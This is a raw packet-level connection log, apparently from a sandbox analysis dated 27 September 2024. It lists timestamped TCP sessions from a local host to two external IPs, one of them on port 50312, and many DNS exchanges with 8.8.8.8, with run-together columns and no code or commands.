                                                                                                      Sep 27, 2024 12:51:56.133419037 CEST4917480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:56.133476973 CEST4917480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:56.347287893 CEST8049174104.168.32.148192.168.2.22
                                                                                                      Sep 27, 2024 12:51:56.347364902 CEST4917480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:51:56.631161928 CEST4917480192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:52:09.312937021 CEST4917550312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:09.317936897 CEST503124917545.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:09.318085909 CEST4917550312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:09.334175110 CEST4917550312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:09.338956118 CEST503124917545.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:30.703176975 CEST503124917545.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:30.703257084 CEST4917550312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:30.703337908 CEST4917550312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:30.711263895 CEST503124917545.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:37.753170967 CEST4917650312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:37.758080006 CEST503124917645.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:37.758155107 CEST4917650312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:37.761764050 CEST4917650312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:37.766789913 CEST503124917645.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:59.119616032 CEST503124917645.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:52:59.119714022 CEST4917650312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:59.144716978 CEST4917650312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:52:59.149677038 CEST503124917645.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:53:33.002523899 CEST4917180192.168.2.22104.168.32.148
                                                                                                      Sep 27, 2024 12:54:01.742799044 CEST4917750312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:54:01.747582912 CEST503124917745.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:54:01.750339985 CEST4917750312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:54:01.758702040 CEST4917750312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:54:01.763690948 CEST503124917745.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:54:23.159853935 CEST503124917745.134.140.68192.168.2.22
                                                                                                      Sep 27, 2024 12:54:23.160130024 CEST4917750312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:54:23.161056042 CEST4917750312192.168.2.2245.134.140.68
                                                                                                      Sep 27, 2024 12:54:23.175658941 CEST503124917745.134.140.68192.168.2.22
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 27, 2024 12:51:31.103806019 CEST5456253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:31.117337942 CEST53545628.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:33.760612965 CEST5291753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:33.772002935 CEST53529178.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:35.515815020 CEST6275153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:35.529005051 CEST53627518.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:35.530850887 CEST5789353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:35.538244963 CEST53578938.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:39.588354111 CEST5482153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:39.595208883 CEST53548218.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:39.597053051 CEST5471953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:39.608285904 CEST53547198.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:40.912826061 CEST4988153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:40.933341980 CEST53498818.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:40.935252905 CEST5499853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:40.942069054 CEST53549988.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:50.204842091 CEST5278153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:50.211376905 CEST53527818.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:51:56.682825089 CEST6392653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:57.681818008 CEST6392653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:51:58.695801973 CEST6392653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:00.708497047 CEST6392653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:01.689421892 CEST53639268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:02.688401937 CEST53639268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:02.694823980 CEST6551053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:03.702383995 CEST53639268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:03.703469038 CEST6551053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:03.817558050 CEST53639268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:04.717514038 CEST6551053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:06.731138945 CEST6551053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:07.701378107 CEST53655108.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:08.709635973 CEST53655108.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:09.100706100 CEST6267253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:09.107887983 CEST53626728.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:09.724097967 CEST53655108.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:11.762531996 CEST53655108.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:31.719338894 CEST5647553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:32.721080065 CEST5647553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:33.733685970 CEST5647553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:35.745956898 CEST5647553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:36.728404045 CEST53564758.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:36.826630116 CEST53564758.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:37.745115042 CEST4938453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:52:37.752424955 CEST53493848.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:38.740008116 CEST53564758.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:52:40.752069950 CEST53564758.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:00.170618057 CEST5484253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:00.368447065 CEST53548428.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:00.368963003 CEST5484253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:01.377011061 CEST5484253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:03.389255047 CEST5484253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:05.380186081 CEST53548428.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:05.380410910 CEST5484253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:06.385660887 CEST53548428.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:07.410631895 CEST5810553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:08.412539005 CEST5810553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:08.419262886 CEST53581058.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:08.419467926 CEST5810553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:08.426491976 CEST53581058.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:08.426665068 CEST5810553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:08.632849932 CEST53548428.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:10.386605978 CEST53548428.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:12.421672106 CEST5810553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:12.427447081 CEST53581058.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:13.434952974 CEST53581058.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:13.445568085 CEST6492853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:13.615089893 CEST53649288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:13.615322113 CEST6492853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:14.632747889 CEST6492853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:16.633691072 CEST6492853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:16.779191971 CEST53649288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:16.782390118 CEST6492853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:16.793035030 CEST53649288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.430013895 CEST53581058.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.793962955 CEST53649288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.864708900 CEST5739053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:17.880947113 CEST53573908.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.881176949 CEST5739053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:17.963257074 CEST53573908.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.973742008 CEST5739053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:17.984709024 CEST53573908.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.984872103 CEST5739053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:17.991823912 CEST53573908.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:17.991961956 CEST5739053192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:17.999262094 CEST53573908.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:18.689536095 CEST53649288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:19.014983892 CEST5809553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:19.089066982 CEST53580958.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:19.089282036 CEST5809553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:19.099067926 CEST53580958.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:19.099222898 CEST5809553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:19.106091022 CEST53580958.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:19.106216908 CEST5809553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:19.119169950 CEST53580958.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:19.119349957 CEST5809553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:19.131695986 CEST53580958.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:20.156239986 CEST5426153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:21.157814026 CEST5426153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:21.254677057 CEST53542618.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:21.254931927 CEST5426153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:21.262382984 CEST53542618.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:21.262566090 CEST5426153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:25.260504007 CEST5426153192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:26.034904003 CEST53542618.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:26.313342094 CEST53542618.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:27.045352936 CEST6050753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:27.099343061 CEST53542618.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:27.105560064 CEST53605078.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:27.105776072 CEST6050753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:27.121918917 CEST53605078.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:27.122139931 CEST6050753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:27.130748987 CEST53605078.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:27.130896091 CEST6050753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:27.138137102 CEST53605078.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:27.138268948 CEST6050753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:27.145992994 CEST53605078.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:28.156682968 CEST5044653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:28.576081991 CEST53504468.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:28.576432943 CEST5044653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:28.583595991 CEST53504468.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:28.611727953 CEST5044653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:28.618961096 CEST53504468.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:28.620433092 CEST5044653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:28.627381086 CEST53504468.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:28.628386974 CEST5044653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:28.635029078 CEST53504468.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:29.654067993 CEST5593953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:30.668418884 CEST5593953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:30.702874899 CEST53559398.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:30.703072071 CEST5593953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:32.705634117 CEST5593953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:32.711815119 CEST53559398.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:32.728193998 CEST5593953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:34.769220114 CEST53559398.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:35.713361979 CEST53559398.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:35.822860956 CEST4960853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:36.847718000 CEST4960853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:36.854726076 CEST53496088.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:36.854953051 CEST4960853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:37.734555006 CEST53559398.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:38.863867044 CEST4960853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:38.870749950 CEST53496088.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:38.871081114 CEST4960853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:38.877532005 CEST53496088.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:39.883455038 CEST6148653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:39.890532970 CEST53614868.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:39.890722036 CEST6148653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:39.898092985 CEST53614868.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:39.898230076 CEST6148653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:39.905225039 CEST53614868.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:39.905344009 CEST6148653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:39.913239956 CEST53614868.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:39.917277098 CEST6148653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:39.923724890 CEST53614868.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:40.829200983 CEST53496088.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:40.971227884 CEST6245353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:41.861426115 CEST53496088.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:41.996819973 CEST6245353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:43.026762009 CEST6245353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:45.025789976 CEST6245353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:46.200342894 CEST53624538.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:46.200613976 CEST6245353192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:47.003608942 CEST53624538.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:47.304478884 CEST53624538.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:48.015567064 CEST5056853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:48.033371925 CEST53624538.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:49.019390106 CEST5056853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:49.425704956 CEST53505688.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:49.425901890 CEST5056853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:49.432674885 CEST53505688.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:49.432832003 CEST5056853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:50.034231901 CEST53624538.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:52.537024975 CEST53505688.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:52.537313938 CEST5056853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:52.544259071 CEST53505688.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:53.553610086 CEST6146753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:53.939667940 CEST53505688.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:54.031927109 CEST53614678.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:54.032134056 CEST6146753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:54.039519072 CEST53614678.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:54.039829969 CEST6146753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:54.048127890 CEST53614678.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:54.048264980 CEST6146753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:54.055480003 CEST53614678.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:54.055615902 CEST6146753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:54.062772989 CEST53614678.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:55.254973888 CEST6161853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:56.257906914 CEST6161853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:56.264687061 CEST53616188.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:56.264853001 CEST6161853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:56.271814108 CEST53616188.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:56.271974087 CEST6161853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:56.278295040 CEST53616188.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:56.278548002 CEST6161853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:56.285697937 CEST53616188.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:56.351878881 CEST53616188.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:57.292988062 CEST5442253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:57.300039053 CEST53544228.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:57.302481890 CEST5442253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:57.310620070 CEST53544228.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:57.314451933 CEST5442253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:57.321315050 CEST53544228.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:57.327419043 CEST5442253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:57.334239960 CEST53544228.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:57.338381052 CEST5442253192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:57.345212936 CEST53544228.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:58.354511976 CEST5207453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:58.362145901 CEST53520748.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:58.362325907 CEST5207453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:58.369751930 CEST53520748.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:58.369890928 CEST5207453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:58.376868010 CEST53520748.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:58.376998901 CEST5207453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:58.383585930 CEST53520748.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:58.383708000 CEST5207453192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:58.390918970 CEST53520748.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:59.402847052 CEST5033753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:59.409761906 CEST53503378.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:59.410008907 CEST5033753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:59.416726112 CEST53503378.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:59.416981936 CEST5033753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:59.423537970 CEST53503378.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:59.423688889 CEST5033753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:59.430841923 CEST53503378.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:53:59.430968046 CEST5033753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:53:59.438091993 CEST53503378.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:00.448559046 CEST6182653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:00.586030006 CEST53618268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:00.586544037 CEST6182653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:00.593481064 CEST53618268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:00.594464064 CEST6182653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:00.601928949 CEST53618268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:00.602626085 CEST6182653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:00.609203100 CEST53618268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:00.610601902 CEST6182653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:00.618079901 CEST53618268.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:01.697026968 CEST5632953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:01.704528093 CEST53563298.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:01.706152916 CEST5632953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:01.713033915 CEST53563298.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:01.726037025 CEST5632953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:01.733222008 CEST53563298.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:01.734406948 CEST5632953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:01.741456985 CEST53563298.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:24.176172972 CEST6346953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:24.221298933 CEST53634698.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:24.221484900 CEST6346953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:24.230035067 CEST53634698.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:24.230211973 CEST6346953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:24.241312027 CEST53634698.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:24.241676092 CEST6346953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:24.253029108 CEST53634698.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:24.253168106 CEST6346953192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:24.259841919 CEST53634698.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:25.286578894 CEST5944753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:25.345444918 CEST53594478.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:25.348685980 CEST5944753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:25.394316912 CEST53594478.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:25.394542933 CEST5944753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:25.422143936 CEST53594478.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:25.422580004 CEST5944753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:25.459995985 CEST53594478.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:25.460236073 CEST5944753192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:25.517633915 CEST53594478.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:26.702043056 CEST5182853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:27.732548952 CEST5182853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:28.737181902 CEST5182853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:28.892338037 CEST53518288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:28.892606020 CEST5182853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:28.939970970 CEST53518288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:28.940253019 CEST5182853192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:29.034223080 CEST53518288.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:30.052012920 CEST5340653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:30.061414957 CEST53534068.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:30.062529087 CEST5340653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:30.069441080 CEST53534068.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:30.070456982 CEST5340653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:30.077294111 CEST53534068.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:30.078438997 CEST5340653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:30.085267067 CEST53534068.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:30.086441994 CEST5340653192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:30.094918013 CEST53534068.8.8.8192.168.2.22
                                                                                                      Sep 27, 2024 12:54:31.113188028 CEST5634553192.168.2.228.8.8.8
                                                                                                      Sep 27, 2024 12:54:31.120096922 CEST53563458.8.8.8192.168.2.22
